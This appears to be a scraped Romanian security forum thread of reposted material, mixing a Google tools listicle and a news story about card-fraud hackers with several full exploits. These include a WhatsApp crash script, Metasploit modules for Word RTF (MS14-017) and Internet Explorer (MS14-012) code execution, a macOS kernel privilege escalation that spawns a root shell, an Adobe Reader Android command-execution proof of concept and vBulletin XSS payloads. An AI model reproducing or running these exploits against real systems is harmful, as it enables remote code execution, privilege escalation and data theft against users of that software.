Nytro

Whatsapp ? your LAST SEEN wasn’t my fault Sir I want to hack whatsapp chat ? Please give me a tutorial link This question made me to write this simple POC tutorial to hack/steal whatsapp chats from any android mobile (in intial level), so as we know whatsapp is one of the very famous chat messenger used in mobile this days recently acquired by facebook Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/32719.pdf

[h=1]WhatsApp < v2.11.7 - Remote Crash[/h] #!/usr/bin/python #-*- coding: utf-8 -* # Title: WhatsApp Remote Crash on non-printable characters # Product: WhatsApp # Vendor Homepage: http://www.whatsapp.com # Vulnerable Version(s): 2.11.7 and prior on iOS # Tested on: WhatsApp v2.11.7 on iPhone 5 running iOS 7.0.4 # Solution Status: Fixed by Vendor on v2.11.8 # Date: 8/04/2014 # # Authors: # Jaime Sánchez @segofensiva <jsanchez (at) seguridadofensiva.com> # Pablo San Emeterio @psaneme <psaneme (at) gmail.com> # # Custom message with non-printable characters will crash any WhatsApp client < v2.11.7 for iOS. # It uses Yowsup library, that provides us with the options of registration, reading/sending messages, and even # engaging in an interactive conversation over WhatsApp protocol # # More info at: # [url]http://www.seguridadofensiva.com/2014/04/crash-en-whatsapp-para-iphone-en-versiones-inferiores-a-2.11.7.html[/url] # See the slides of the research/talk at RootedCON 2014 at: # [url]http://www.slideshare.net/segofensiva/whatsapp-mentiras-y-cintas-de-video-rootedcon-2014[/url] import argparse, sys, os, csv from Yowsup.Common.utilities import Utilities from Yowsup.Common.debugger import Debugger from Yowsup.Common.constants import Constants from Examples.CmdClient import WhatsappCmdClient from Examples.EchoClient import WhatsappEchoClient from Examples.ListenerClient import WhatsappListenerClient from Yowsup.Registration.v1.coderequest import WACodeRequest from Yowsup.Registration.v1.regrequest import WARegRequest from Yowsup.Registration.v1.existsrequest import WAExistsRequest from Yowsup.Registration.v2.existsrequest import WAExistsRequest as WAExistsRequestV2 from Yowsup.Registration.v2.coderequest import WACodeRequest as WACodeRequestV2 from Yowsup.Registration.v2.regrequest import WARegRequest as WARegRequestV2 from Yowsup.Contacts.contacts import WAContactsSyncRequest import threading,time, base64 DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth" COUNTRIES_CSV = "countries.csv" DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth" ######## Yowsup Configuration file ##################### # Your configuration should contain info about your login credentials to Whatsapp. This typically consist of 3 fields:\n # phone: Your full phone number including country code, without '+' or '00' # id: This field is used in registration calls (-r|-R|-e), and for login if you are trying to use an existing account that is setup # on a physical device. Whatsapp has recently deprecated using IMEI/MAC to generate the account's password in updated versions # of their clients. Use --v1 switch to try it anyway. Typically this field should contain the phone's IMEI if your account is setup on # a Nokia or an Android device, or the phone's WLAN's MAC Address for iOS devices. If you are not trying to use existing credentials # or want to register, you can leave this field blank or set it to some random text. # password: Password to use for login. You obtain this password when you register using Yowsup. ###################################################### MINE_CONFIG ="config.cfg" def getCredentials(config = DEFAULT_CONFIG): if os.path.isfile(config): f = open(config) phone = "" idx = "" pw = "" cc = "" try: for l in f: line = l.strip() if len(line) and line[0] not in ('#',';'): prep = line.split('#', 1)[0].split(';', 1)[0].split('=', 1) varname = prep[0].strip() val = prep[1].strip() if varname == "phone": phone = val elif varname == "id": idx = val elif varname =="password": pw =val elif varname == "cc": cc = val return (cc, phone, idx, pw); except: pass return 0 def main(phone): credentials = getCredentials(MINE_CONFIG or DEFAULT_CONFIG ) if credentials: countryCode, login, identity, password = credentials identity = Utilities.processIdentity(identity) password = base64.b64decode(password) # Custom message that will crash WhatsApp message = message = "\xf4\xaa\xde\x04\xbf" #print countryCode, login, identity, password wa = WhatsappEchoClient(phone, message) wa.login(login, password) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("number", help="Phone number to send the crash message") parser.add_argument("-v", "--verbose", help="increase output verbosity", action="store_true") args = parser.parse_args() Debugger.enabled = args.verbose main(args.number) Sursa: http://www.exploit-db.com/exploits/32865/

[h=1]MS14-017 Microsoft Word RTF Object Confusion[/h] ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => "MS14-017 Microsoft Word RTF Object Confusion", 'Description' => %q{ This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in how a listoverridecount field can be modified to treat one structure as another. This bug was originally seen being exploited in the wild starting in April 2014. This module was created by reversing a public malware sample. }, 'Author' => [ 'Haifei Li', # vulnerability analysis 'Spencer McIntyre', 'unknown' # malware author ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-1761'], ['MSB', 'MS14-017'], ['URL', 'http://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers'], ['URL', 'https://www.virustotal.com/en/file/e378eef9f4ea1511aa5e368cb0e52a8a68995000b8b1e6207717d9ed09e8555a/analysis/'] ], 'Platform' => 'win', 'Arch' => ARCH_X86, 'Payload' => { 'StackAdjustment' => -3500, 'Space' => 375, 'DisableNops' => true }, 'Targets' => [ # winword.exe v14.0.7116.5000 (SP2) [ 'Microsoft Office 2010 SP2 English on Windows 7 SP1 English', { } ], ], 'DefaultTarget' => 0, 'Privileged' => true, 'DisclosureDate' => 'Apr 1 2014')) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'msf.rtf']) ], self.class) end def exploit junk = rand(0xffffffff) rop_chain = [ 0x275de6ae, # ADD ESP,0C # RETN [MSCOMCTL.ocx] junk, junk, 0x27594a2c, # PUSH ECX # POP ESP # AND DWORD PTR [ESI+64],0FFFFFFFB # POP ESI # POP ECX # RETN [MSCOMCTL.ocx] 0x2758b042, # RETN [MSCOMCTL.ocx] 0x2761bdea, # POP EAX # RETN [MSCOMCTL.ocx] 0x275811c8, # ptr to &VirtualAlloc() [IAT MSCOMCTL.ocx] 0x2760ea66, # JMP [EAX] [MSCOMCTL.ocx] 0x275e0081, # POP ECX # RETN [MSCOMCTL.ocx] 0x40000000, 0x00100000, 0x00003000, 0x00000040, 0x00001000, 0x275fbcfc, # PUSH ESP # POP EDI # POP ESI # RETN 8 [MSCOMCTL.ocx] junk, 0x275e0861, # MOV EAX,EDI # POP EDI # POP ESI # RETN [MSCOMCTL.ocx] junk, junk, junk, junk, 0x275ebac1, # XCHG EAX,ESI # NOP # ADD EAX,MSORES+0x13000000 # RETN 4 [MSCOMCTL.ocx] 0x275e0327, # POP EDI # RETN [MSCOMCTL.ocx] junk, 0x40000000, 0x275ceb04, # REP MOVS BYTE [EDI],BYTE [ESI] # XOR EAX,EAX # JMP MSCOMCTL!DllGetClassObject0x3860 [MSCOMCTL.ocx] junk, junk, junk, junk, 0x40000040 ].pack("V*") exploit_data = [ junk ].pack("v") exploit_data << rop_chain exploit_data << payload.encoded exploit_data << make_nops(exploit_data.length % 2) exploit_data = exploit_data.unpack("S<*") exploit_data = exploit_data.map { |word| " ?\\u-#{0x10000 - word}" } exploit_data = exploit_data.join template_part1 = 0x1e04 template_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2014-1761.rtf") template_rtf = ::File.open(template_path, 'rb') exploit_rtf = template_rtf.read(template_part1) exploit_rtf << exploit_data exploit_rtf << template_rtf.read file_create(exploit_rtf) end end Sursa: http://www.exploit-db.com/exploits/32793/

[h=1]Apple Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Privilege Escalation Exploit[/h] /* * Apple Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 NFS Mount Privilege Escalation Exploit * CVE None * by Kenzley Alphonse <kenzley [dot] alphonse [at] gmail [dot] com> * * * Notes: * This exploit leverage a stack overflow vulnerability to escalate privileges. * The vulnerable function nfs_convert_old_nfs_args does not verify the size * of a user-provided argument before copying it to the stack. As a result by * passing a large size, a local user can overwrite the stack with arbitrary * content. * * Tested on Max OS X Lion xnu-1699.22.73 (x86_64) * Tested on Max OS X Lion xnu-1699.32.7 (x86_64) * * Greets to taviso, spender, joberheide */ #include <stdio.h> #include <stdlib.h> #include <strings.h> #include <errno.h> #include <sys/mman.h> #include <sys/mount.h> #include <sys/param.h> #include <sys/stat.h> #include <sys/types.h> #include <unistd.h> /** change these to fit your environment if needed **/ #define SSIZE (536) /** struct user_nfs_args was copied directly from "/bsd/nfs/nfs.h" of the xnu kernel **/ struct user_nfs_args { int version; /* args structure version number */ char* addr __attribute__((aligned(8))); /* file server address */ int addrlen; /* length of address */ int sotype; /* Socket type */ int proto; /* and Protocol */ char * fh __attribute__((aligned(8))); /* File handle to be mounted */ int fhsize; /* Size, in bytes, of fh */ int flags; /* flags */ int wsize; /* write size in bytes */ int rsize; /* read size in bytes */ int readdirsize; /* readdir size in bytes */ int timeo; /* initial timeout in .1 secs */ int retrans; /* times to retry send */ int maxgrouplist; /* Max. size of group list */ int readahead; /* # of blocks to readahead */ int leaseterm; /* obsolete: Term (sec) of lease */ int deadthresh; /* obsolete: Retrans threshold */ char* hostname __attribute__((aligned(8))); /* server's name */ /* NFS_ARGSVERSION 3 ends here */ int acregmin; /* reg file min attr cache timeout */ int acregmax; /* reg file max attr cache timeout */ int acdirmin; /* dir min attr cache timeout */ int acdirmax; /* dir max attr cache timeout */ /* NFS_ARGSVERSION 4 ends here */ uint auth; /* security mechanism flavor */ /* NFS_ARGSVERSION 5 ends here */ uint deadtimeout; /* secs until unresponsive mount considered dead */ }; /** sets the uid for the current process and safely exits from the kernel**/ static void r00t_me() { asm( // padding "nop; nop; nop; nop;" // task_t %rax = current_task() "movq %%gs:0x00000008, %%rax;" "movq 0x00000348(%%rax), %%rax;" // proc %rax = get_bsdtask_info() "movq 0x000002d8(%%rax),%%rax;" // ucred location at proc "movq 0x000000d0(%%rax),%%rax;" // uid = 0 "xorl %%edi, %%edi;" "movl %%edi, 0x0000001c(%%rax);" "movl %%edi, 0x00000020(%%rax);" // fix the stack pointer and return (EACCES) "movq $13, %%rax;" "addq $0x00000308,%%rsp;" "popq %%rbx;" "popq %%r12;" "popq %%r13;" "popq %%r14;" "popq %%r15;" "popq %%rbp;" "ret;" :::"%rax" ); } int main(int argc, char ** argv) { struct user_nfs_args xdrbuf; char * path; char obuf[SSIZE]; /** clear the arguments **/ memset(&xdrbuf, 0x00, sizeof(struct user_nfs_args)); memset(obuf, 0x00, SSIZE); /** set up variable to get path to vulnerable code **/ xdrbuf.version = 3; xdrbuf.hostname = "localhost"; xdrbuf.addrlen = SSIZE; xdrbuf.addr = obuf; /** set ret address **/ *(unsigned long *)&obuf[528] = (unsigned long) (&r00t_me + 5); printf(" [*] set ret = 0x%.16lx\n", *(unsigned long *)&obuf[528]); /** create a unique tmp name **/ if ((path = tmpnam(NULL)) == NULL) { // path can be any directory which we have read/write/exec access // but I'd much rather create one instead of searching for one perror("[-] tmpnam"); exit(EXIT_FAILURE); } /** make the path in tmp so that we can use it **/ if (mkdir(path, 0660) < 0) { perror("[-] mkdir"); exit(EXIT_FAILURE); } /** inform the user that the path was created **/ printf(" [*] created sploit path%s\n", path); /** call the vulnerable function **/ if (mount("nfs", path, 0, &xdrbuf) < 0) { if (errno == EACCES) { puts("[+] escalating privileges..."); } else { perror("[-] mount"); } } /** clean up tmp dir **/ if (rmdir(path) < 0) { perror("[-] rmdir"); } /** check if privs are equal to root **/ if (getuid() != 0) { puts("[-] priviledge escalation failed"); exit(EXIT_FAILURE); } /** get root shell **/ printf("[+] We are now uid=%i ... your welcome!\n", getuid()); printf("[+] Dropping a shell.\n"); execl("/bin/sh", "/bin/sh", NULL); return 0; } Sursa: http://www.exploit-db.com/exploits/32813/

[h=1]Adobe Reader for Android 11.1.3 - Arbitrary JavaScript Execution[/h] ------------------------------------------------------------------------ Adobe Reader for Android exposes insecure Javascript interfaces ------------------------------------------------------------------------ Yorick Koster, April 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ Adobe Reader for Android [2] exposes several insecure Javascript interfaces. This issue can be exploited by opening a malicious PDF in Adobe Reader. Exploiting this issue allows for the execution of arbitrary Java code, which can result in a compromise of the documents stored in Reader and files stored on SD card. ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully verified on Adobe Reader for Android version 11.1.3. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Adobe released version 11.2.0 of Adobe Reader that add @javascriptInterface [3] annotations to public methods that should be exposed in the Javascript interfaces. In addition, the app now targets API Level 17 and contains a static method (shouldInitializeJavaScript()) that is used to check the device's Android version. [url]http://www.securify.nl/advisory/SFY20140401/reader_11.2.0_release_notes.png[/url] Figure 1: Adobe Reader for Android 11.2.0 release notes ------------------------------------------------------------------------ Introduction ------------------------------------------------------------------------ Adobe Reader for Android allows users to work with PDF documents on an Android tablet or phone. According to Google Play, the app is installed on 100 million to 500 million devices. The following classes expose one or more Javascript interfaces: - ARJavaScript - ARCloudPrintActivity - ARCreatePDFWebView The app targets API Level 10, which renders the exposed Javascript interfaces vulnerable to code execution - provided that an attacker manages to run malicious Javascript code within Adobe Reader. ------------------------------------------------------------------------ PDF Javascript APIs ------------------------------------------------------------------------ It appears that Adobe Reader for Mobile supports [4] a subset of the Javascript for Acrobat APIs. For some reason the exposed Javscript objects are prefixed with an underscore character. public class ARJavaScript { [...] public ARJavaScript(ARViewerActivity paramARViewerActivity) { [...] this.mWebView.addJavascriptInterface(new ARJavaScriptInterface(this), "_adobereader"); this.mWebView.addJavascriptInterface(new ARJavaScriptApp(this.mContext), "_app"); this.mWebView.addJavascriptInterface(new ARJavaScriptDoc(), "_doc"); this.mWebView.addJavascriptInterface(new ARJavaScriptEScriptString(this.mContext), "_escriptString"); this.mWebView.addJavascriptInterface(new ARJavaScriptEvent(), "_event"); this.mWebView.addJavascriptInterface(new ARJavaScriptField(), "_field"); this.mWebView.setWebViewClient(new ARJavaScript.1(this)); this.mWebView.loadUrl("file:///android_asset/javascript/index.html"); } An attacker can create a specially crafted PDF file containing Javascript that runs when the target user views (or interacts with) this PDF file. Using any of the Javascript objects listed above provides the attacker access to the public Reflection APIs inherited from Object. These APIs can be abused to run arbitrary Java code. ------------------------------------------------------------------------ Proof of concept ------------------------------------------------------------------------ The following proof of concept [5] will create a text file in the app sandbox. function execute(bridge, cmd) { return bridge.getClass().forName('java.lang.Runtime') .getMethod('getRuntime',null).invoke(null,null).exec(cmd); } if(window._app) { try { var path = '/data/data/com.adobe.reader/mobilereader.poc.txt'; execute(window._app, ['/system/bin/sh','-c','echo \"Lorem ipsum\" > ' + path]); window._app.alert(path + ' created', 3); } catch(e) { window._app.alert(e, 0); } } ------------------------------------------------------------------------ References ------------------------------------------------------------------------ [1] [url]http://www.securify.nl/advisory/SFY20140401/adobe_reader_for_android_exposes_insecure_javascript_interfaces.html[/url] [2] [url]https://play.google.com/store/apps/details?id=com.adobe.reader[/url] [3] [url]http://developer.android.com/reference/android/webkit/JavascriptInterface.html[/url] [4] [url]http://www.adobe.com/devnet-docs/acrobatetk/tools/Mobile/js.html#supported-javascript-apis[/url] [5] [url]http://www.securify.nl/advisory/SFY20140401/mobilereader.poc.pdf[/url] Sursa: http://www.exploit-db.com/exploits/32884/

[h=1]MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free[/h] ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free", 'Description' => %q{ This module exploits an use after free condition on Internet Explorer as used in the wild on the "Operation SnowMan" in February 2014. The module uses Flash Player 12 in order to bypass ASLR and finally DEP. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability discovery and Exploit in the wild 'Jean-Jamil Khalife', # Exploit 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2014-0322' ], [ 'MSB', 'MS14-012' ], [ 'BID', '65551' ], [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html'], [ 'URL', 'http://hdwsec.fr/blog/CVE-2014-0322.html' ] ], 'Platform' => 'win', 'Arch' => ARCH_X86, 'Payload' => { 'Space' => 960, 'DisableNops' => true, 'PrependEncoder' => stack_adjust }, 'BrowserRequirements' => { :source => /script|headers/i, :os_name => Msf::OperatingSystems::WINDOWS, :os_flavor => Msf::OperatingSystems::WindowsVersions::SEVEN, :ua_name => Msf::HttpClients::IE, :ua_ver => '10.0', :mshtml_build => lambda { |ver| ver.to_i < 16843 }, :flash => /^12\./ }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f', 'Retries' => false }, 'Targets' => [ [ 'Windows 7 SP1 / IE 10 / FP 12', { } ], ], 'Privileged' => false, 'DisclosureDate' => "Feb 13 2014", 'DefaultTarget' => 0)) end def stack_adjust adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset adjust end def create_swf path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0322", "AsXploit.swf" ) fd = ::File.open( path, "rb" ) swf = fd.read(fd.stat.size) fd.close return swf end def exploit @swf = create_swf super end def on_request_uri(cli, request) print_status("Request: #{request.uri}") if request.uri =~ /\.swf$/ print_status("Sending SWF...") send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'}) return end super end def on_request_exploit(cli, request, target_info) print_status("Sending HTML...") send_exploit_html(cli, exploit_template(cli, target_info)) end def exploit_template(cli, target_info) flash_payload = "" get_payload(cli,target_info).unpack("V*").each do |i| flash_payload << "0x#{i.to_s(16)}," end flash_payload.gsub!(/,$/, "") html_template = %Q| <html> <head> </head> <body> <script> var g_arr = []; var arrLen = 0x250; function dword2data(dword) { var d = Number(dword).toString(16); while (d.length < 8) d = '0' + d; return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4)); } function eXpl() { var a=0; for (a=0; a < arrLen; a++) { g_arr[a] = document.createElement('div'); } var b = dword2data(0x19fffff3); while (b.length < 0x360) { if (b.length == (0x98 / 2)) { b += dword2data(0x1a000010); } else if (b.length == (0x94 / 2)) { b += dword2data(0x1a111111); } else if (b.length == (0x15c / 2)) { b += dword2data(0x42424242); } else { b += dword2data(0x19fffff3); } } var d = b.substring(0, ( 0x340 - 2 )/2); try{ this.outerHTML=this.outerHTML } catch(e){ } CollectGarbage(); for (a=0; a < arrLen; a++) { g_arr[a].title = d.substring(0, d.length); } } function trigger() { var a = document.getElementsByTagName("script"); var b = a[0]; b.onpropertychange = eXpl; var c = document.createElement('SELECT'); c = b.appendChild(c); } </script> <embed src=#{rand_text_alpha(4 + rand(3))}.swf FlashVars="version=<%=flash_payload%>" width="10" height="10"> </embed> </body> </html> | return html_template, binding() end end Sursa: MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free

How Sercomm saved my Easter! Another backdoor in my router: when Christmas is NOT enough! Released 18/04/2014 By Eloi Vanderbeken - Synacktiv Download: http://www.synacktiv.com/ressources/TCP32764_backdoor_again.pdf

[h=1]14 Google Tools You Didn't Know Existed[/h] [h=2]1. Google Ngram Viewer[/h] Google's Ngram Viewer lets you search keywords in millions of books over the span of half a millennium, a useful tool for finding trends over time. For power users, the Ngram Viewer also has advanced options, such as searching for particular keywords as specific parts of speech or combining keywords. Just in case you ever wanted to see how big cocaine was in Victorian times, now you can. Screenshot courtesy of Google Ngram Viewer. [h=2]2. Google Correlate[/h] A part of Google Trends, Google Correlate allows you to look at search trends over time. For example, input "soup" and you'll see a clear increase in searches during the winter months. The more fascinating part of Google Correlate is the Search by Drawing function. Draw a fun graph and Correlate will give you search keywords that best match your graph creation. Screenshot courtesy of Google Correlate. [h=2]3. Google Trends[/h] Look at trends in hot searches with Google Trends. Browse by date, or look at top searches in different categories with the new Top Charts function. Finally, with the Explore function, input a search term and see how it trended over time and location. You can also now view popular searches in a colorful fullscreen format. Screenshot courtesy of Google Trends. [h=2]4. Google Think Insights[/h] Home to an abundance of resources, Google Think Insights is a useful tool for entrepreneurs and industry professionals. There are case studies, new findings and tips on how to grow your business, as well as showcases of exemplary projects. Finally, there are also tools for maximizing your site analytics and ad campaigns. A particularly useful collection is how to "Make Your Website Work Across Different Platforms." Screenshot courtesy of Google Think Insights. [h=2]5. Google Public Data Explorer[/h] Search through databases from around the world, including the World Bank, OECD, Eurostat and the U.S. Census Bureau. After you find what you want, filter through categories to make graphs with the axes you want. Google's Public Data Explorer then displays the data in a line graph, bar graph, scatterplot or on a map. Screenshot courtesy of Google Public Data Explorer. [h=2]6. Full Value of Mobile[/h] A useful calculator for businesses, Google's Full Value of Mobile will calculate just how much having a mobile site is worth. The tool will help you analyze how customers interact with the various aspects of your business, from mobile sites to calls to cross-device ability. Screenshot courtesy of Full Value of Mobile. [h=2]7. Get Your Business Online[/h] Get Your Business Online is Google's initiative to get more local businesses on the web, in an effort to boost the local economy as well as help small businesses grow. The initiative also encourages people to get other businesses online, with an end goal of reaching every local business in America. There are also listings for events and lessons. The free service also includes hosting for one year. Screenshot courtesy of Get Your Business Online. [h=2]8. Webmaster Tools[/h] Google's Webmaster Tools allows webmasters to monitor a site's health and traffic. Additional tools include a Structure Data Markup Helper and Google Places for Business. Video: YouTube, GoogleWebmasterHelp [h=2]9. Schemer[/h] Schemer is like a combination to-do list and social event planning app. Connect via your Google+ account, enter your preferences, and Schemer will offer some things to do around your area. A great tool for travelers who want to make the most out of a visit, as well as for locals who want to find something to do on an otherwise boring day. You can also collaborate with the friends in your Google+ Circles and see who wants to do the same things as you. Screenshot courtesy of Schemer. [h=2]10. Google Fonts[/h] Google Fonts offers open source web fonts for all to use privately or commercially. As of now, there are 629 font families available. Filter fonts by thickness, slant, width and script. Screenshot courtesy of Google Fonts. [h=2]11. Google Developers[/h] Google Developers houses a plethora of resources that developers can use, tools such as internationalizing different websites and live presentations of tutorials. Developers can also join groups in a local area for meetups and collaboration. Screenshot courtesy of Google Developers. [h=2]12. Dart[/h] Dart is a programming language developed by Google in hopes of eventually replacing JavaScript as the language of modern web apps. Dart was released in 2011 and is still in its development stages. With a goal to make coding and collaboration simpler, Dart was designed to be simple enough that even beginning developers could learn from it. Screenshot courtesy of Dart. [h=2]13. Google Keep[/h] Launched earlier this year, Google Keep app connects to your Google Drive. Sync-able across all your devices, Google Keep allows you to keep notes, voice memos, pictures and checklists in order. The easy-to-use interface is a simple app for those looking to do basic note-keeping on-the-go. Video: YouTube, GoogleMobile [h=2]14. Google Sky[/h] A part of Google Earth, Google Sky allows you to explore space and star systems. In collaboration with NASA, using images from the Hubble Telescope, Google Sky is one of three subsidiaries of Google Earth, the others being Google Mars and Google Moon. Screenshot courtesy of Google Sky. Sursa: 14 Google Tools You Didn't Know Existed

Packetstorm: vBulletin 5.1 Cross Site Scripting ? Packet Storm

Exploit Title: vBulletin 5.1 Multiple XSS vulnerabilities Authors: Romanian Security Team Website: https://rstforums.com/forum/ Date published: 19 April 2014 Software: vBulletin Version: 5.1.1 Alpha 9 [XSS] Random topic - https://website.com/[forum_path]/forum/anunturi-importante/rst-power/67030-rst-admin-restore?view=stream1337";alert(123);// [XSS] New private message - https://website.com/[forum_path]/privatemessage/new/9999"><input onfocus=alert(1) autofocus> [XSS] View PM: you must know or bruteforce private message ID (830372) - https://website.com/[forum_path]/privatemessage/view/830372?folderid=random";alert(1);// [DOM XSS] Help - https://website.com/[forum_path]/help#'"><img src=x onerror=prompt("PoC")> (c) Romanian Security Team 2014

Dezactivati bre semnaturile

Povestea celor trei hackeri români care au reu?it s? sparg? sistemele de securitate ale retailerilor americani Autor: Luciana Georgescu Serviciile Secrete Americane ?i FBI-ul vor s? foloseasc? cazul a 3 hackeri români implica?i în opera?iuni de fraud? electronic? împotriva retailerilor americani, drept exemplu pentru cercet?rile ce au loc în prezent în cazul scurgerii de informa?ii din baza de date a companiei Target Corp. 40.000 de milioane de carduri de credit ?i debit au fost afectate în urma scurgerii de informa?ii de anul trecut în SUA, scrie Bloomberg. Procurorii federali au avut nevoie de 3 ani pentru a-i prinde pe hackerii români, Cezar Butu, Adrian Tiberiu Oprea ?i Iulian Dolan, care au reu?it s? sparg? sistemele de securitate a mai multor retaileri americani ?i s? fure numerele de identificare a peste 100.000 de carduri de credit ?i debit din SUA. Cezar Butu a fost condamnat la 1 an ?i 9 luni de închisoare, pentru derularea unor opera?iuni de fraud? electronic? ?i furtul de date financiare, dup? ce în septembrie 2012 a pledat vinovat. Cu ajutorul unui software, românii c?utau pe Internet calculatoare vulnerabile ale retailerilor din SUA, intrau în bazele de date ?i furau numerele de card ale cump?r?torilor, pe care ulterior le distribuiau clien?ilor personali, r?spândi?i peste tot în lume. Subway, lan?ul american de restaurante fast-food, a fost unul dintre cei mai afecta?i retaileri. Dup? mai multe reclama?ii venite din partea b?ncilor colaboratoare, poli?ia federal? a descoperit c? hackerii foloseau un program care prelua toate informa?iile ce intrau în sistemul bancar în momentul în care clien?ii î?i pl?teau comenzile cu cardul, prin intermediul POS-ului. Numele de utilizatori ?i emailurile au fost schimbate pentru a-?i proteja identitatea, îns? hackerii au fost neglijen?i alegând sa comunice în limba matern? ?i s[ paroleze anumite informa?ii folosindu-se de cuvinte tot în limba român? – C?r?bu?05. În octombrie anul trecut, procurorii federali au luat urma românilor, dup? ce unul dintre ei, Adrian Tiberiu Oprea, a men?ionat într-o conversa?ie online c? Poli?ia Român? a descins la adresa personal? pentru cercet?ri în cazul activit??ilor de hacking din Europa de Est. Adrian Tiberiu Oprea, în vârst? de 27 de ani este absolvent al Facult??ii Automatic? ?i Calculatoare din Constan?a. În urma verific?rii a peste 15.000 de emailuri ?i post?ri pe siteurile de socializare, agentul Serviciilor Secrete Americane responsabil pentru acest caz, Matt O’Neill a descoperit identiatea unuia dintre partenerii lui Oprea – Cezar Butu, un român de 27 de ani, stabilit în Fran?a ?i a lui Iulian Dolan, implicat de asemenea în ac?iunile de fraud?. Cei 3 hackeri au pledat vinova?i, recunoscând c? au compromis peste 800 de magazine din SUA, dintre care peste 250 apar?inând lan?ului de restaurante Subway. Dolan ?i Oprea au declarat mai târziu c? ?inta lor nu a fost Subway, îns? au avut noroc s? descopere c? pot sparge sistemul unui num?r foarte mare de calculatoare, din cauza securit??ii sc?zute. Hackerii nu au ob?inut profituri mari ca urmare a opera?iunilor derulate. Oprea a strâns în cont “doar” 40.000 de dolari. El a fost nevoit s? pl?teasc? 12,5 milioane de dolari pentru daunele insitu?iilor financiare ?i alte 5 milioane de dolari pentru îmbun?t??irea sistemului de securitate al lan?ului de restaurante Subway. În septembrie 2012, Oprea a primit o sentin?? de 15 ani de închisoare, în timp ce Dolan va râmâne în spatele gratiilor timp de 7 ani. Sursa: Povestea celor trei hackeri români care au reu?it s? sparg? sistemele de securitate ale retailerilor americani | Ziarul Financiar De preferat ca lectura: http://www.bloomberg.com/news/2014-04-17/u-s-agent-lures-romanian-hackers-in-subway-data-heist.html

V-am bagat suport pentru Tapatalk. Link: http://tapatalk.com/ Cautati "rstforums.com" pentru a gasi forumul. Edit: E foarte misto, va recomand.

"Hack Away at the Unessential" with ExpLib2 in Metasploit Posted by Wei Chen in Metasploit on Apr 7, 2014 11:26:18 AM This blog post was jointly written by Wei sinn3r Chen and Juan Vazquez Memory corruption exploitation is not how it used to be. With modern mitigations in place, such as GS, SafeSEH, SEHOP, DEP, ASLR/FASLR, EAF+, ASR, VTable guards, memory randomization, and sealed optimization, etc, exploit development has become much more complicated. It definitely shows when you see researchers jumping through hoops like reverse-engineering some 0-day vulnerability and the software, turning a use-after-free crash into an arbitrary write, leak an object and disclose a module base, and customized ROP and shellcode. Watching an exploit developer work is like watching a : you see him trying to thrust, hack, kick, hitting left and right, from the ground all the way to rooftops, and then next thing you know he just popped a shell. It's all very fancy. Oh, and it's real.Despite all the fanciness of modern exploitation, security researcher Yuki Chen (who is the exploit dev version of Bruce Lee) took a different turn. If you're not much of a Bruce Lee fan, well, Lee was really big in the philosophy of simplicity. In his words: [TABLE=width: 100%] [TR] [TD=align: right][/TD] [TD]“It’s not the daily increase but daily decrease. Hack away at the unessential.”[/TD] [/TR] [/TABLE] What Yuki Chen wanted to do was avoid dealing with the hassle of EAF, DEP, shellcode, and other things. Basically, going for the most straight-forward punch with the least amount of effort. His idea of simplicity and the creation of ExpLib2 are what make him so Bruce Lee. However, we notice that the security community hasn't been talking about his stuff much, so here we'd like to go over his work on ExpLib2 more in depth, hopefully to spark more interest. ExpLib2 is basically Yuki's exploitation library for Internet Explorer. To be able to use this, it assumes you already have a bug for an arbitrary write. And then you will have to use this bug to modify the length field of an array in memory, and you tell the library where it is, what payload to run, and that's all it needs from you. To give you an idea how much you're writing for the exploit, take a good look at the following example: function modifyArray() { // Use your bug and modify the array here // For testing, we do: ed 1a1b3000+18 400 } function example() { var num_arrays = 98688; var arr_size = (0x1000 - 0x20)/4; var explib = new ExpLib( num_arrays, arr_size, 0x1a1b3000, new payload_exec('calc.exe') ); explib.setArrContents([0x21212121, 0x22222222, 0x23232323, 0x24242424]); // There is a default one too explib.spray(); modifyArray(); explib.go(); // Code execution } The go() function from ExpLib2 will then use the information initialized by you and leak objects in order to figure out where the security manager is, makes a copy of it, have it modified (and patches other necessary functions), that way the ScriptEngine functions will end up using your fake security manager, and execute your payload in "god mode". This is pretty much the summarized version of the technique, which is also briefly 